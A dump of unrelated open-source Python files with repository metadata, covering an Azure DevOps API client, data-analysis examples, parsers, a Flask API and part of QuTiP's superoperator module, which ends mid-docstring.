return self._deserialize('[WebApiTeam]', self._unwrap_collection(response))
def update_team(self, team_data, project_id, team_id):
"""UpdateTeam.
Update a team's name and/or description.
:param :class:`<WebApiTeam> <azure.devops.v5_0.core.models.WebApiTeam>` team_data:
:param str project_id: The name or ID (GUID) of the team project containing the team to update.
:param str team_id: The name of ID of the team to update.
:rtype: :class:`<WebApiTeam> <azure.devops.v5_0.core.models.WebApiTeam>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
if team_id is not None:
route_values['teamId'] = self._serialize.url('team_id', team_id, 'str')
content = self._serialize.body(team_data, 'WebApiTeam')
response = self._send(http_method='PATCH',
location_id='d30a3dd1-f8ba-442a-b86a-bd0c0c383e59',
version='5.0',
route_values=route_values,
content=content)
return self._deserialize('WebApiTeam', response)
def get_all_teams(self, mine=None, top=None, skip=None):
"""GetAllTeams.
[Preview API] Get a list of all teams.
:param bool mine: If true return all the teams requesting user is member, otherwise return all the teams user has read access
:param int top: Maximum number of teams to return.
:param int skip: Number of teams to skip.
:rtype: [WebApiTeam]
"""
query_parameters = {}
if mine is not None:
query_parameters['$mine'] = self._serialize.query('mine', mine, 'bool')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='7a4d9ee9-3433-4347-b47a-7a80f1cf307e',
version='5.0-preview.2',
query_parameters=query_parameters)
return self._deserialize('[WebApiTeam]', self._unwrap_collection(response))
|
27df837a92165313839d59db51a64531ec0c0c3b
|
2bacad06ed143d941bb65a49a6dec91572b22305
|
/tests/_support/tree/deploy.py
|
35f749ec79865e8b745b5c8146695c226af13e8b
|
[
"BSD-2-Clause"
] |
permissive
|
pyinvoke/invoke
|
86ad280d862dc8f5cb6baf5c0bfba9aeb97fd95d
|
07b836f2663bb073a7bcef3d6c454e1dc6b867ae
|
refs/heads/main
| 2023-09-01T16:04:50.414421
| 2023-07-12T18:04:56
| 2023-07-12T18:04:56
| 3,587,206
| 3,702
| 401
|
BSD-2-Clause
| 2023-07-11T07:18:40
| 2012-02-29T23:59:23
|
Python
|
UTF-8
|
Python
| false
| false
| 301
|
py
|
deploy.py
|
"How to deploy our code and configs."
from invoke import task
@task(default=True)
def everywhere(c):
"Deploy to all targets."
pass
@task(aliases=["db_servers"])
def db(c):
"Deploy to our database servers."
pass
@task
def web(c):
"Update and bounce the webservers."
pass
|
1c622384c983eb3e23779db324eb005b2bed8e06
|
e7f662e18141c11bb452a31b844dd5555cca11dd
|
/doc/examples/event_related_fmri.py
|
44cb399129cafcb64ce4fecc5b09096f2f1668a3
|
[
"BSD-3-Clause"
] |
permissive
|
nipy/nitime
|
75c7786e17514ecc7045c42760cd42b1c16ca0d6
|
4411b3047e37d21354e399aaaca77810f50c5fe2
|
refs/heads/master
| 2023-06-29T21:13:24.231303
| 2023-06-15T22:33:13
| 2023-06-15T22:33:13
| 294,865
| 198
| 69
|
BSD-3-Clause
| 2023-08-25T20:49:40
| 2009-09-02T00:29:57
|
Python
|
UTF-8
|
Python
| false
| false
| 4,192
|
py
|
event_related_fmri.py
|
"""
.. _et-fmri:
==================
Event-related fMRI
==================
Extracting the average time-series from one signal, time-locked to the
occurrence of some type of event in another signal is a very typical operation
in the analysis of time-series from neuroscience experiments. Therefore, we
have an additional example of this kind of analysis in :ref:`grasshopper`
The following example is taken from an fMRI experiment in which a subject was
viewing a motion stimulus, while fMRI BOLD was recorded. The time-series in
this data set were extracted from motion-sensitive voxels near area MT (a
region containing motion-sensitive cells) in this subject's brain. 6 different
kinds of trials could occur in this experiment (designating different
directions and locations of motion). The following example shows the extraction
of the time-dependent responses of the voxels in this region to the different
stimuli.
We start by importing modules/functions used and define some variables we will
use in the analysis:
"""
import os
import numpy as np
import matplotlib.pyplot as plt
import nitime
import nitime.timeseries as ts
import nitime.analysis as nta
import nitime.viz as viz
TR = 2.
len_et = 15 # This is given in number of samples, not time!
"""
Next, we load the data into an array from the csv file, using ``np.loadtxt``
"""
data_path = os.path.join(nitime.__path__[0], 'data')
fname = os.path.join(data_path, 'event_related_fmri.csv')
data = np.genfromtxt(fname, dtype=float, delimiter=',', names=True)
"""
We initialize TimeSeries objects with the data and the TR:
One TimeSeries is initialized for the BOLD data:
"""
t1 = ts.TimeSeries(data['bold'], sampling_interval=TR)
"""
And another one for the events (the different stimuli):
"""
t2 = ts.TimeSeries(data['events'], sampling_interval=TR)
"""
Note that this example uses the EventRelated analyzer (also used in the
:ref:`grasshopper` example), but here, instead of providing an :class:`Events`
object as input, another :class:`TimeSeries` object is provided, containing an
equivalent time-series with the same dimensions as the time-series on which the
analysis is done, with '0' wherever no event of interest occurred and an integer
wherever an even of interest occurred (sequential different integers for the
different kinds of events).
"""
E = nta.EventRelatedAnalyzer(t1, t2, len_et)
"""
Two different methods of the EventRelatedAnalyzer are used: :attr:`E.eta`
refers to the event-triggered average of the activity and :attr:`E.ets` refers
to the event-triggered standard error of the mean (where the degrees of freedom
are set by the number of trials). Note that you can also extract the
event-triggered data itself as a list, by referring instead to
:attr:`E.et_data`.
We pass the eta and ets calculations straight into the visualization function,
which plots the result:
"""
fig01 = viz.plot_tseries(E.eta, ylabel='BOLD (% signal change)', yerror=E.ets)
"""
.. image:: fig/event_related_fmri_01.png
In the following example an alternative approach is taken to calculating
the event-related activity, based on the finite impulse-response
model (see [Burock2000]_ for details)
"""
fig02 = viz.plot_tseries(E.FIR, ylabel='BOLD (% signal change)')
"""
.. image:: fig/event_related_fmri_02.png
Yet another method is based on a cross-correlation performed in the frequency
domain (thanks to Lavi Secundo for providing a previous implementation of this
idea). This method can speed up calculation substantially for long time-series,
because the calculation is done using a vector multiplication in the frequency
domain representation of the time-series, instead of a more computationally
expensive convolution-like operation
"""
fig03 = viz.plot_tseries(E.xcorr_eta, ylabel='BOLD (% signal change)')
"""
.. image:: fig/event_related_fmri_03.png
We call plt.show() in order to display all the figures:
"""
plt.show()
"""
.. [Burock2000] M.A. Burock and A.M.Dale (2000). Estimation and Detection of
Event-Related fMRI Signals with Temporally Correlated Noise: A
Statistically Efficient and Unbiased Approach. Human Brain Mapping,
11:249-260
"""
|
31c4275e05845abf58061a2907de0749279a5b1b
|
75f81c32befeccc59b958cf849c777359df68d73
|
/container/sample-inf1/inf1_mx.py
|
eeaa72a12bf7e9c9d8b1d3537dc9a129425ee115
|
[
"Apache-2.0"
] |
permissive
|
neo-ai/neo-ai-dlr
|
4e20b40235e1be2d44f55b13cec3c15fc42dba2a
|
457aabf677ed368aa1077093fce4517381e04038
|
refs/heads/main
| 2023-06-07T17:21:14.600599
| 2022-08-26T22:03:40
| 2022-08-26T22:03:40
| 161,846,808
| 490
| 125
|
Apache-2.0
| 2023-05-18T05:38:28
| 2018-12-14T22:25:31
|
C++
|
UTF-8
|
Python
| false
| false
| 2,037
|
py
|
inf1_mx.py
|
import mxnet as mx
#import neomxnet
import os
import json
import numpy as np
from collections import namedtuple
import os
dtype='float32'
Batch = namedtuple('Batch', ['data'])
ctx = mx.neuron()
is_gpu = False
def model_fn(model_dir):
print("param {}".format(os.environ.get('MODEL_NAME_CUSTOM')))
print("ctx {}".format(ctx))
sym, arg_params, aux_params = mx.model.load_checkpoint(os.path.join(model_dir, os.environ.get('MODEL_NAME_CUSTOM')), 0)
mod = mx.mod.Module(symbol=sym, context=ctx, label_names=None)
for arg in arg_params:
arg_params[arg] = arg_params[arg].astype(dtype)
for arg in aux_params:
aux_params[arg] = aux_params[arg].astype(dtype)
exe = mod.bind(for_training=False,
data_shapes=[('data', (1,3,224,224))],
label_shapes=mod._label_shapes)
mod.set_params(arg_params, aux_params, allow_missing=True)
return mod
def transform_fn(mod, img, input_content_type, output_content_type):
'''
stream = os.popen('/opt/aws/neuron/bin/neuron-cli list-model')
output = stream.read()
print(output)
stream = os.popen('/opt/aws/neuron/bin/neuron-cli list-ncg')
output = stream.read()
print(output)
'''
image = mx.image.imdecode(img)
resized = mx.image.resize_short(image, 224) # minimum 224x224 images
cropped, crop_info = mx.image.center_crop(resized, (224, 224))
normalized = mx.image.color_normalize(cropped.astype(np.float32) / 255,
mean=mx.nd.array([0.485, 0.456, 0.406]),
std=mx.nd.array([0.229, 0.224, 0.225]))
# the network expect batches of the form (N,3,224,224)
transposed = normalized.transpose((2, 0, 1)) # Transposing from (224, 224, 3) to (3, 224, 224)
batchified = transposed.expand_dims(axis=0) # change the shape from (3, 224, 224) to (1, 3, 224, 224)
image = batchified.astype(dtype='float32')
mod.forward(Batch([image]))
prob = mod.get_outputs()[0].asnumpy().tolist()
prob_json = json.dumps(prob)
return prob_json, output_content_type
|
8a4ca45ef2d4230b3ae00400c5d5e1cf1fcd0a9d
|
73305ddcc6dc9775b1e9a71506e2f3c74f678edc
|
/starthinker/tool/dv.py
|
3404aff39fa7275fb81cc939724589f55b39e27f
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
google/starthinker
|
ef359557da4140275a8524d0d813eecf022ece9e
|
b596df09c52511e2e0c0987f6245aa4607190dd0
|
refs/heads/master
| 2023-08-25T21:16:45.578012
| 2023-07-17T22:19:18
| 2023-07-17T22:20:10
| 123,017,995
| 167
| 64
|
Apache-2.0
| 2023-08-02T01:24:51
| 2018-02-26T19:15:09
|
Python
|
UTF-8
|
Python
| false
| false
| 3,271
|
py
|
dv.py
|
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
import json
import argparse
import textwrap
from starthinker.util.google_api import API_DBM
from starthinker.util.dv import report_file, report_to_rows, report_clean
from starthinker.util.bigquery import get_schema
from starthinker.util.csv import rows_to_type, rows_print
from starthinker.util.configuration import commandline_parser, Configuration
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent("""\
Command line to help debug DV360 reports and build reporting tools.
Examples:
To get list of reports: python dv.py --list -u [user credentials path]
To get report json: python dv.py --report [id] -u [user credentials path]
To get report schema: python dv.py --schema [id] -u [user credentials path]
To get report sample: python dv.py --sample [id] -u [user credentials path]
"""))
# create parameters
parser.add_argument(
'--report', help='report ID to pull json definition', default=None)
parser.add_argument(
'--schema', help='report ID to pull schema format', default=None)
parser.add_argument(
'--sample', help='report ID to pull sample data', default=None)
parser.add_argument('--list', help='list reports', action='store_true')
# initialize project
parser = commandline_parser(parser, arguments=('-u', '-c', '-s', '-v'))
args = parser.parse_args()
config = Configuration(
user=args.user,
client=args.client,
service=args.service,
verbose=args.verbose
)
auth = 'service' if args.service else 'user'
# get report
if args.report:
report = API_DBM(config, auth).queries().get(
queryId=args.report).execute()
print(json.dumps(report, indent=2, sort_keys=True))
# get schema
elif args.schema:
filename, report = report_file(config, auth, args.schema, None, 10)
rows = report_to_rows(report)
rows = report_clean(rows)
rows = rows_to_type(rows)
print(json.dumps(get_schema(rows)[1], indent=2, sort_keys=True))
# get sample
elif args.sample:
filename, report = report_file(config, auth, args.sample, None, 10)
rows = report_to_rows(report)
rows = report_clean(rows)
rows = rows_to_type(rows)
for r in rows_print(rows, row_min=0, row_max=20):
pass
# get list
else:
for report in API_DBM(config, auth, iterate=True).queries().list().execute():
print(json.dumps(report, indent=2, sort_keys=True))
if __name__ == '__main__':
main()
|
0856a6cedb001ccbb27a5d97abb1d8950c01aa2a
|
b8d80a23cb27af08a1c4d34b478c76228ae5fbb4
|
/insights/parsers/ls_disk.py
|
af5dd78ed078d6d49d369f3ae783a0fcefe3152c
|
[
"Apache-2.0"
] |
permissive
|
RedHatInsights/insights-core
|
bb243e2bf8a52446fefb95ebe05478d6e35efe2e
|
b0ea07fc3f4dd8801b505fe70e9b36e628152c4a
|
refs/heads/master
| 2023-09-04T21:15:40.456257
| 2023-09-04T10:46:56
| 2023-09-04T10:46:56
| 92,518,221
| 144
| 290
|
Apache-2.0
| 2023-09-14T02:40:13
| 2017-05-26T14:23:11
|
Python
|
UTF-8
|
Python
| false
| false
| 3,326
|
py
|
ls_disk.py
|
"""
LsDisk - Command ``ls -lanR /dev/disk``
=======================================
The ``ls -lanR /dev/disk`` command provides information for the listing of the
directories under ``/dev/disk/`` .
Sample input is shown in the Examples. See ``FileListing`` class for
additional information.
Examples:
>>> LS_DISK = '''
... /dev/disk/by-id:
... total 0
... drwxr-xr-x. 2 0 0 360 Sep 20 09:36 .
... drwxr-xr-x. 5 0 0 100 Sep 20 09:36 ..
... lrwxrwxrwx. 1 0 0 9 Sep 20 09:36 ata-VBOX_CD-ROM_VB2-01700376 -> ../../sr0
... lrwxrwxrwx. 1 0 0 9 Sep 20 09:36 ata-VBOX_HARDDISK_VB4c56cb04-26932e6a -> ../../sdb
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 ata-VBOX_HARDDISK_VB4c56cb04-26932e6a-part1 -> ../../sdb1
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 scsi-SATA_VBOX_HARDDISK_VB4c56cb04-26932e6a-part1 -> ../../sdb1
...
... /dev/disk/by-path:
... total 0
... drwxr-xr-x. 2 0 0 160 Sep 20 09:36 .
... drwxr-xr-x. 5 0 0 100 Sep 20 09:36 ..
... lrwxrwxrwx. 1 0 0 9 Sep 20 09:36 pci-0000:00:0d.0-scsi-1:0:0:0 -> ../../sdb
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 pci-0000:00:0d.0-scsi-1:0:0:0-part1 -> ../../sdb1
...
... /dev/disk/by-uuid:
... total 0
... drwxr-xr-x. 2 0 0 100 Sep 20 09:36 .
... drwxr-xr-x. 5 0 0 100 Sep 20 09:36 ..
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 3ab50b34-d0b9-4518-9f21-05307d895f81 -> ../../dm-1
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 51c5cf12-a577-441e-89da-bc93a73a1ba3 -> ../../sda1
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 7b0068d4-1399-4ce7-a54a-3e2fc1232299 -> ../../dm-0
... '''
>>> from insights.tests import context_wrap
>>> ls_disk = LsDisk(context_wrap(LS_DISK))
<__main__.LsDisk object at 0x7f674914c690>
>>> "/dev/disk/by-path" in ls_disk
True
>>> ls_disk.files_of("/dev/disk/by-path")
['pci-0000:00:0d.0-scsi-1:0:0:0', 'pci-0000:00:0d.0-scsi-1:0:0:0-part1']
>>> ls_disk.dirs_of("/dev/disk/by-path")
['.', '..']
>>> ls_disk.specials_of("/dev/disk/by-path")
[]
>>> ls_disk.listing_of("/dev/disk/by-path").keys()
['pci-0000:00:0d.0-scsi-1:0:0:0-part1', 'pci-0000:00:0d.0-scsi-1:0:0:0', '..', '.']
>>> ls_disk.dir_entry("/dev/disk/by-path", "pci-0000:00:0d.0-scsi-1:0:0:0")
{'group': '0', 'name': 'pci-0000:00:0d.0-scsi-1:0:0:0', 'links': 1, 'perms': 'rwxrwxrwx.',
'raw_entry': 'lrwxrwxrwx. 1 0 0 9 Sep 20 09:36 pci-0000:00:0d.0-scsi-1:0:0:0 -> ../../sdb', 'owner': '0',
'link': '../../sdb', 'date': 'Sep 20 09:36', 'type': 'l', 'size': 9}
>>> ls_disk.listing_of('/dev/disk/by-path')['.']['type'] == 'd'
True
>>> ls_disk.listing_of('/dev/disk/by-path')['pci-0000:00:0d.0-scsi-1:0:0:0']['link']
'../../sdb'
"""
from .. import parser, FileListing, CommandParser
from insights.specs import Specs
from insights.util import deprecated
@parser(Specs.ls_disk)
class LsDisk(CommandParser, FileListing):
"""
.. warning::
This Parser is deprecated and will be removed from 3.5.0.
Please use the :class:`insights.parsers.ls.LSlanR` instead.
Parses output of ``ls -lanR /dev/disk`` command.
"""
def __init__(self, *args, **kwargs):
deprecated(LsDisk, "Please use the :class:`insights.parsers.ls.LSlanR` instead.", "3.5.0")
super(LsDisk, self).__init__(*args, **kwargs)
|
67dce38f70534e6700f1a55951b4d93e7701a4cb
|
30674cc03db1e93c0d5a6ff213b528d8ea70bb6a
|
/luma/core/legacy/__init__.py
|
3890e8b9718621a27eccd56d18bb7c18813d1dbd
|
[
"MIT"
] |
permissive
|
rm-hull/luma.core
|
6df4db6f6886a562dca9eec82e3cc42fe4dd5f98
|
d871d66644288b788641af0b3a20d3a97583dd70
|
refs/heads/master
| 2023-03-04T01:37:36.636573
| 2023-02-21T07:52:03
| 2023-02-21T07:52:03
| 78,548,891
| 134
| 61
|
MIT
| 2023-09-01T20:59:12
| 2017-01-10T15:55:14
|
Python
|
UTF-8
|
Python
| false
| false
| 3,138
|
py
|
__init__.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017-18 Richard Hull and contributors
# See LICENSE.rst for details.
"""
These methods were originally present in the old MAX7219 driver, and are
preserved here only to aid migration away from that library. The functions are
denoted 'legacy' to discourage use - you are encouraged to use the various
drawing capabilities in the Pillow library instead.
"""
from luma.core.render import canvas
from luma.core.virtual import viewport
from luma.core.sprite_system import framerate_regulator
from luma.core.legacy.font import DEFAULT_FONT
def textsize(txt, font=None):
"""
Calculates the bounding box of the text, as drawn in the specified font.
This method is most useful for when the
:py:class:`~luma.core.legacy.font.proportional` wrapper is used.
:param txt: The text string to calculate the bounds for
:type txt: str
:param font: The font (from :py:mod:`luma.core.legacy.font`) to use.
"""
font = font or DEFAULT_FONT
src = [c for ascii_code in txt for c in font[ord(ascii_code)]]
return (len(src), 8)
def text(draw, xy, txt, fill=None, font=None):
"""
Draw a legacy font starting at :py:attr:`x`, :py:attr:`y` using the
prescribed fill and font.
:param draw: A valid canvas to draw the text onto.
:type draw: PIL.ImageDraw
:param txt: The text string to display (must be ASCII only).
:type txt: str
:param xy: An ``(x, y)`` tuple denoting the top-left corner to draw the
text.
:type xy: tuple
:param fill: The fill color to use (standard Pillow color name or RGB
tuple).
:param font: The font (from :py:mod:`luma.core.legacy.font`) to use.
"""
font = font or DEFAULT_FONT
x, y = xy
for ch in txt:
for byte in font[ord(ch)]:
for j in range(8):
if byte & 0x01 > 0:
draw.point((x, y + j), fill=fill)
byte >>= 1
x += 1
def show_message(device, msg, y_offset=0, fill=None, font=None,
scroll_delay=0.03):
"""
Scrolls a message right-to-left across the devices display.
:param device: The device to scroll across.
:param msg: The text message to display (must be ASCII only).
:type msg: str
:param y_offset: The row to use to display the text.
:type y_offset: int
:param fill: The fill color to use (standard Pillow color name or RGB
tuple).
:param font: The font (from :py:mod:`luma.core.legacy.font`) to use.
:param scroll_delay: The number of seconds to delay between scrolling.
:type scroll_delay: float
"""
fps = 0 if scroll_delay == 0 else 1.0 / scroll_delay
regulator = framerate_regulator(fps)
font = font or DEFAULT_FONT
with canvas(device) as draw:
w, h = textsize(msg, font)
x = device.width
virtual = viewport(device, width=w + x + x, height=device.height)
with canvas(virtual) as draw:
text(draw, (x, y_offset), msg, font=font, fill=fill)
i = 0
while i <= w + x:
with regulator:
virtual.set_position((i, 0))
i += 1
|
6e5287763ef247ff6529012446e95c86b8aea3a2
|
35b6013c1943f37d1428afd2663c8aba0a02628d
|
/compute/client_library/ingredients/instances/get_serial_port.py
|
76503c320525b53f67f125c3f1a6bb65f42254ca
|
[
"Apache-2.0"
] |
permissive
|
GoogleCloudPlatform/python-docs-samples
|
d2a251805fbeab15d76ed995cf200727f63f887d
|
44e819e713c3885e38c99c16dc73b7d7478acfe8
|
refs/heads/main
| 2023-08-28T12:52:01.712293
| 2023-08-28T11:18:28
| 2023-08-28T11:18:28
| 35,065,876
| 7,035
| 7,593
|
Apache-2.0
| 2023-09-14T20:20:56
| 2015-05-04T23:26:13
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,831
|
py
|
get_serial_port.py
|
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This is an ingredient file. It is not meant to be run directly. Check the samples/snippets
# folder for complete code samples that are ready to be used.
# Disabling flake8 for the ingredients file, as it would fail F821 - undefined name check.
# flake8: noqa
from google.cloud import compute_v1
# <INGREDIENT get_instance_serial_port_output>
def get_instance_serial_port_output(
project_id: str, zone: str, instance_name: str
) -> compute_v1.SerialPortOutput:
"""
Returns the last 1 MB of serial port output from the specified instance.
Args:
project_id: project ID or project number of the Cloud project you want to use.
zone: name of the zone you want to use. For example: “us-west3-b”
instance_name: name of the VM instance you want to query.
Returns:
Content of the serial port output of an instance inside a compute_v1.SerialPortOutput object.
More about this type: https://cloud.google.com/python/docs/reference/compute/latest/google.cloud.compute_v1.types.SerialPortOutput
"""
instance_client = compute_v1.InstancesClient()
return instance_client.get_serial_port_output(
project=project_id, zone=zone, instance=instance_name
)
# </INGREDIENT>
|
e98ba344af68ebaaf1419efa360ef6ba70ec880b
|
463d49f20a5c0c0851c53d5e16514c265f8910aa
|
/datausa/core/views.py
|
f317423382948e6d15cfa8d5674ae76359a0a052
|
[] |
no_license
|
DataUSA/datausa-api
|
f6c503680f66b470c77a4ab9f0e7a4643659252f
|
7288dede082eda07b61e11cf6dc801fe692f6334
|
refs/heads/master
| 2022-02-14T00:03:13.241210
| 2022-01-31T17:16:27
| 2022-01-31T17:16:27
| 37,325,775
| 251
| 50
| null | 2022-01-13T13:00:27
| 2015-06-12T14:13:50
|
Python
|
UTF-8
|
Python
| false
| false
| 4,282
|
py
|
views.py
|
from flask import Blueprint, request, jsonify
from datausa.attrs.models import Cip, Naics, University
from datausa.core import table_manager
from datausa.core import api, join_api
from datausa.core.models import ApiObject
from datausa.core.crosswalker import crosswalk
from datausa.util.big_places import is_big_geo
from datausa.core.exceptions import DataUSAException
mod = Blueprint('core', __name__, url_prefix='/api')
manager = table_manager.TableManager()
def show_attrs(attr_obj):
attrs = attr_obj.query.all()
data = [a.serialize() for a in attrs]
return jsonify(data=data)
def build_api_obj(default_limit=None):
show = request.args.get("show", "")
sumlevel = request.args.get("sumlevel", "").lower()
required = request.args.get("required", "")
force = request.args.get("force", "")
where = request.args.get("where", "")
order = request.args.get("order", "")
sort = request.args.get("sort", "")
limit = request.args.get("limit", default_limit)
offset = request.args.get("offset", None)
exclude = request.args.get("exclude", None)
auto_crosswalk = request.args.get("auto_crosswalk", False)
display_names = request.args.get("display_names", False)
shows = show.split(",")
sumlevels = sumlevel.split(",")
if shows and not sumlevel:
sumlevels = ["all" for show in shows]
values = required.split(",") if required else []
shows_and_levels = {val:sumlevels[idx] for idx, val in enumerate(shows)}
variables = manager.possible_variables
vars_and_vals = {var:request.args.get(var, None) for var in variables}
vars_and_vals = {k:v for k,v in vars_and_vals.items() if v}
vars_needed = vars_and_vals.keys() + shows + values
api_obj = ApiObject(vars_needed=vars_needed, vars_and_vals=vars_and_vals,
shows_and_levels=shows_and_levels, values=values,
where=where, force=force, order=order,
sort=sort, limit=limit, exclude=exclude,
auto_crosswalk=auto_crosswalk,
display_names=display_names,
offset=offset)
return api_obj
@mod.route("/")
@mod.route("/v1/")
@mod.route("/csv/", defaults={'csv': True})
def api_view(csv=None):
api_obj = build_api_obj()
api_obj = manager.force_1yr_for_big_places(api_obj)
api_obj = manager.schema_selector(api_obj)
table_list = manager.all_tables(api_obj)
table = manager.select_best(table_list, api_obj)
api_obj.capture_logic(table_list)
api_obj = manager.crosswalk(table, api_obj)
data = api.query(table, api_obj, stream=csv)
return data
@mod.route("/join/")
@mod.route("/join/csv/", defaults={'csv': True})
def api_join_view(csv=None):
api_obj = build_api_obj(default_limit=500)
if api_obj.limit and api_obj.limit > 80000:
raise DataUSAException("Limit parameter must be less than 80,000")
tables = manager.required_tables(api_obj)
data = join_api.joinable_query(tables, api_obj, manager.table_years, csv_format=csv)
return data
@mod.route("/logic/")
def logic_view():
api_obj = build_api_obj()
table_list = manager.all_tables(api_obj)
return jsonify(tables=[table.info(api_obj) for table in table_list])
@mod.route("/variables/")
def view_variables():
'''show available data tables and contained variables'''
shows = request.args.get("show", "").split(",")
sumlevels = request.args.get("sumlevel", "").split(",")
list_all = sumlevels == [""] and shows == [""]
if sumlevels == [""]:
sumlevels = ["all"] * len(shows)
combos = zip(shows, sumlevels)
results = {table.full_name(): table.col_strs(short_name=True) for table in table_manager.registered_models
if list_all or all([table.can_show(show, sumlevel) for show,sumlevel in combos])}
return jsonify(metadata=results)
@mod.route('/table/variables/')
def all_table_vars():
'''show all available data tables and contained variables'''
results = {table.full_name(): table.col_strs(short_name=True) for table in table_manager.registered_models}
return jsonify(metadata=results)
@mod.route("/years/")
def years_view():
years_data = manager.table_years_set
return jsonify(data=years_data)
|
f5a3afe0917cd5913b329aed0306274253f961d4
|
49173bc5a31caa2adf5f304f2f55cc3f5fda452a
|
/qutip/core/superoperator.py
|
3ed59fc6231d273c40a41efe1f979ee9de728e9d
|
[
"BSD-3-Clause"
] |
permissive
|
qutip/qutip
|
a35e73670501c33898e24fe72bf255f8fb4a6632
|
2dc5f3f0a6ad2175e6dc015649989125401fc3bf
|
refs/heads/master
| 2023-09-01T01:09:53.422153
| 2023-08-25T14:18:15
| 2023-08-25T14:18:15
| 6,136,261
| 1,489
| 679
|
BSD-3-Clause
| 2023-09-07T14:16:03
| 2012-10-09T06:20:46
|
Python
|
UTF-8
|
Python
| false
| false
| 14,197
|
py
|
superoperator.py
|
__all__ = [
'liouvillian', 'lindblad_dissipator', 'operator_to_vector',
'vector_to_operator', 'stack_columns', 'unstack_columns', 'stacked_index',
'unstacked_index', 'spost', 'spre', 'sprepost', 'reshuffle',
]
import functools
import numpy as np
from .qobj import Qobj
from . import data as _data
def _map_over_compound_operators(f):
"""
Convert a function which takes Qobj into one that can also take compound
operators like QobjEvo, and applies itself over all the components.
"""
@functools.wraps(f)
def out(qobj):
# To avoid circular dependencies
from .cy.qobjevo import QobjEvo
if isinstance(qobj, QobjEvo):
return qobj.linear_map(f, _skip_check=True)
if not isinstance(qobj, Qobj):
raise TypeError("expected a quantum object")
return f(qobj)
return out
def liouvillian(H=None, c_ops=None, data_only=False, chi=None):
"""Assembles the Liouvillian superoperator from a Hamiltonian
and a ``list`` of collapse operators.
Parameters
----------
H : Qobj or QobjEvo (optional)
System Hamiltonian or Hamiltonian component of a Liouvillian.
Considered `0` if not given.
c_ops : array_like of Qobj or QobjEvo
A ``list`` or ``array`` of collapse operators.
data_only : bool [False]
Return the data object instead of a Qobj
chi : array_like of float [None]
In some systems it is possible to determine the statistical moments (mean, variance, etc) of the
probability distributions of occupation of various states by numerically evaluating the derivatives
of the steady state occupation probability as a function of artificial phase parameters ``chi``
which are included in the :func:`lindblad_dissipator` for each collapse operator. See
the documentation of :func:`lindblad_dissipator` for references and further details.
This parameter is deprecated and may be removed in QuTiP 5.
Returns
-------
L : Qobj or QobjEvo
Liouvillian superoperator.
"""
# To avoid circular dependencies
from .cy.qobjevo import QobjEvo
if (
data_only
and (isinstance(H, QobjEvo)
or any(isinstance(op, QobjEvo) for op in c_ops))
):
raise ValueError("Cannot return the data object when computing the"
" liouvillian with QobjEvo")
c_ops = c_ops or []
if isinstance(c_ops, (Qobj, QobjEvo)):
c_ops = [c_ops]
if chi and len(chi) != len(c_ops):
raise ValueError('chi must be a list with same length as c_ops')
chi = chi or [0] * len(c_ops)
if H is None:
# No Hamiltonian, add the lindblad_dissipator of c_ops:
if not c_ops:
raise ValueError("The liouvillian need an Hamiltonian"
" and/or c_ops")
out = sum(lindblad_dissipator(c_op, chi=chi_)
for c_op, chi_ in zip(c_ops, chi))
return out.data if data_only else out
elif not H.isoper:
raise TypeError("Invalid type for Hamiltonian.")
if isinstance(H, QobjEvo) or any(isinstance(op, QobjEvo) for op in c_ops):
# With QobjEvo, faster computation using Data is not used
L = -1.0j * (spre(H) - spost(H))
L += sum(lindblad_dissipator(c_op, chi=chi_)
for c_op, chi_ in zip(c_ops, chi))
return L
op_dims = H.dims
op_shape = H.shape
sop_dims = [[op_dims[0], op_dims[0]], [op_dims[1], op_dims[1]]]
sop_shape = [np.prod(op_dims), np.prod(op_dims)]
spI = _data.identity(op_shape[0], dtype=type(H.data))
data = _data.mul(_data.kron(spI, H.data), -1j)
data = _data.add(data, _data.kron_transpose(H.data, spI), scale=1j)
for c_op, chi_ in zip(c_ops, chi):
c = c_op.data
cd = c.adjoint()
cdc = _data.matmul(cd, c)
data = _data.add(data, _data.kron(c.conj(), c), np.exp(1j*chi_))
data = _data.add(data, _data.kron(spI, cdc), -0.5)
data = _data.add(data, _data.kron_transpose(cdc, spI), -0.5)
if data_only:
return data
else:
return Qobj(data,
dims=sop_dims,
type='super',
superrep='super',
copy=False)
def lindblad_dissipator(a, b=None, data_only=False, chi=None):
"""
Lindblad dissipator (generalized) for a single pair of collapse operators
(a, b), or for a single collapse operator (a) when b is not specified:
.. math::
\\mathcal{D}[a,b]\\rho = a \\rho b^\\dagger -
\\frac{1}{2}a^\\dagger b\\rho - \\frac{1}{2}\\rho a^\\dagger b
Parameters
----------
a : Qobj or QobjEvo
Left part of collapse operator.
b : Qobj or QobjEvo (optional)
Right part of collapse operator. If not specified, b defaults to a.
chi : float [None]
In some systems it is possible to determine the statistical moments (mean, variance, etc) of the
probability distribution of the occupation numbers of states by numerically evaluating the derivatives
